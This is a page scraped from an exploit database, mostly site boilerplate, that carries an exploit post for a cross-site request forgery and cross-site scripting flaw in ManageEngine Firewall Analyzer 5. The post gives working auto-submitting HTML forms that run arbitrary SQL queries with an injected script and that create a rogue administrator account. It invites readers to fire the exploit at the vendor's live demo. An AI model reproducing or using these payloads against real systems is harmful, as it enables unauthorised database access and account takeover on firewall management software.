0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ManageEngine Firewall Analyzer 5 XSRF/XSS Vulnerability
======================================================= ManageEngine Firewall Analyzer 5 XSRF/XSS Vulnerability ======================================================= Written By Michael Brooks Special thanks to str0ke! Product: ManageEngine Firewall Analyzer 5 - XSRF and XSS Vulerable version: Build Version : 5.0.0 Build Number : 5000 Build Date : Apr_25 homepage: http://fwanalyzer.com/ This is live exploit code against the online demo. Go ahead, run it! With this exploit you can execute any SQL query you want, this is not SQL Injection. I think its funny that the sql query is also vulnerable to xss. XSRF to execute Arbatrary SQL Queries. This is not SQL Injection, its better because you can execute *any* query. <html> <form action='http://demo.fwanalyzer.com/fw/runQuery.do' method='POST' id=1> <input type=hidden name="execute" value="true" > <input type=hidden name="DatabaseType" value="mysql"> <input type=hidden name="query" value='select "<script>alert(/0wn3d/)</script>"'> <input type=submit> </form> </html> Create a new administrative account badmin:badmin: <html> <form action='http://demo.fwanalyzer.com/fw/userManagementForm.do' method='POST' id=2> <input type=hidden name='addField' value='true'> <input type=hidden name='productName' value='firewall'> <input type=hidden name='userType' value='Administrator'> <input type=hidden name='licType' value='Prem'> <input type=hidden name='userName' value='madmin'> <input type=hidden name='pwd1' value='badmin'> <input type=hidden name='password' value='badmin'> <input type=hidden name='userGroup' value='Administrator'> <input type=hidden name='email' value='badmin@badmin.com'> <input type=hidden name='availableDevices' value='301'> <input type=hidden name='Submit3' value='Add User'> <input type=submit> </form> </html> <script> document.getElementById(1).submit(); //document.getElementById(2).submit(); </script> # 0day.today [2024-11-16] #